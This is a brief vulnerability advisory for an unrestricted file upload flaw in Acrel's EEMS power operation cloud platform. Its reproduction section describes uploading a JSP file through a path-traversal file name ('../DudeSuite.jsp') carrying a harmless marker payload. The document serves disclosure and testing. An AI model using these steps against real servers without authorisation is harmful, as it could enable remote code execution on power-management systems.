Acrel EEMS Enterprise Power Operation and Maintenance Cloud Platform Unrestricted File Upload Vulnerability

A vulnerability allowing unrestricted file upload has been identified in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform version 1.3.0. The issue resides in an unknown function of the file '/SubstationWEBV2/main/uploadH5Files', where the manipulation of the 'File' argument enables remote exploitation.

Impact

Exploitation of this vulnerability allows for unrestricted file upload, which could lead to the execution of uploaded files on the server, depending on the file type and the server's configuration.

Reproduction

To reproduce this vulnerability, send a multipart/form-data request to '/SubstationWEBV2/main/uploadH5Files' with the 'file' parameter. Include a file named '../DudeSuite.jsp' that contains a payload, such as '<%="aaaaaaaaaaaaaaaaa"%>'. This request can be made using a tool like Burp Suite or Postman, ensuring that the 'Content-Type' is set to 'multipart/form-data' and that the 'Origin' and 'Referer' headers are included.